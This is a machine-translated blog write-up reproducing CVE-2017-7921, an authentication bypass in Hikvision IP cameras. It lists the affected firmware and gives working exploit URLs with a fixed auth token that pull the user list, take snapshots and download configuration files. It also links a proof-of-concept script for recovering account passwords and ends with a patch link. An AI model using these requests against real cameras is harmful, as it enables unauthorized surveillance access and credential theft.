当前位置:网站首页>Reproduced Xray - cve-2017-7921 (unauthorized access by Hikvision)
Reproduced Xray - cve-2017-7921 (unauthorized access by Hikvision)
2022-07-01 09:01:00 【xiaochuhe.】
One 、 Vulnerability description
many Hikvision IP The camera contains a back door , Allow unauthenticated impersonation of any configured user account . At least from 2014 From the year onwards , This loophole exists in Hikvision's products . except hikvision Brand of equipment , It also affected many white label camera products sold under various brand names . Thousands of vulnerable devices are still exposed to the Internet at the time of release . In addition to obtaining full administrative access , The vulnerability can also be used to retrieve the plaintext password of all configured users .
Two 、 Affects version
HikvisionDS-2CD2xx2F-ISeries5.2.0build140721
Version to 5.4.0build160530 edition ;
DS-2CD2xx0F-ISeries5.2.0build140721
Version to 5.4.0Build160401 edition ;
DS-2CD2xx2FWDSeries5.3.1build150410
Version to 5.4.4Build161125 edition ;
DS-2CD4x2xFWDSeries5.2.0build140721
Version to 5.4.0Build160414 edition ;
DS-2CD4xx5Series5.2.0build140721
Version to 5.4.0Build160421 edition ;
DS-2DFxSeries5.2.0build140805
Version to 5.4.5Build160928 edition ;
DS-2CD63xxSeries5.0.9build140305
Version to 5.3.5Build160106 edition
3、 ... and 、xray Scan results
Four 、 Loophole recurrence
( One ) Not authorized to retrieve a list of all users and their roles
IP/Security/users?auth=YWRtaW46MTEK
Retrieve all users 
( Two ) Take a camera snapshot without authorization
IP/onvif-http/snapshot?auth=YWRtaW46MTEK
Take a shot without authentication 
( 3、 ... and ) Download camera configuration without authorization
IP/System/configurationFile?auth=YWRtaW46MTEK
Download the camera binary configuration file 
( Four ) The most critical step is to obtain the background account
CVE-2017-7921 Loophole recurrence poc- Network security document resources -CSDN download
Use the script to obtain the background account
Successfully logged in !
It's a success !
5、 ... and 、 Repair suggestions
At present, the manufacturer has released an upgrade patch to fix this security problem , Patch get link :
http://www.hikvision.com/us/about_10805.html
边栏推荐
- Win7 pyinstaller reports an error DLL load failed while importing after packaging exe_ Socket: parameter error
- 类加载
- Computer tips
- I would like to know the process of stock registration and account opening by mobile phone? In addition, is it safe to open a mobile account?
- Shell脚本-select in循环
- Personal decoration notes
- JCL 和 SLF4J
- Nacos - 配置管理
- Promise asynchronous programming
- 固定资产管理系统让企业动态掌握资产情况
猜你喜欢
钓鱼识别app
![[interview brush 101] linked list](/img/52/d159bc66c0dbc44c1282a96cf6b2fd.png)
[interview brush 101] linked list
TV size and viewing distance
What are the differences between the architecture a, R and m of arm V7, and in which fields are they applied?
Why is the Ltd independent station a Web3.0 website!
Nacos - gestion de la configuration
Bird recognition app
个人装修笔记
It is designed with high bandwidth, which is almost processed into an open circuit?
Installing Oracle EE
随机推荐
Shell脚本-位置参数(命令行参数)
毕业季,我想对你说
LogBack
pcl_viewer命令
Redis——Lettuce连接redis集群
Shell脚本-特殊变量:Shell $#、$*、[email protected]、$?、$$
Screenshot tips
Shell script - special variables: shell $, $*, [email protected], $$$
Jetson Nano 安装TensorFlow GPU及问题解决
Shell script -read command: read data entered from the keyboard
记一次redis超时
Key points of NFT supervision and overseas policies
Mysql8.0 learning record 17 -create table
Win7 pyinstaller reports an error DLL load failed while importing after packaging exe_ Socket: parameter error
Pain points and solutions of fixed assets management of group companies
Shell脚本-case in 和正则表达式
Shell script case in and regular expressions
Principle and application of single chip microcomputer timer, serial communication and interrupt system
How to effectively align team cognition
Guidelines and principles of did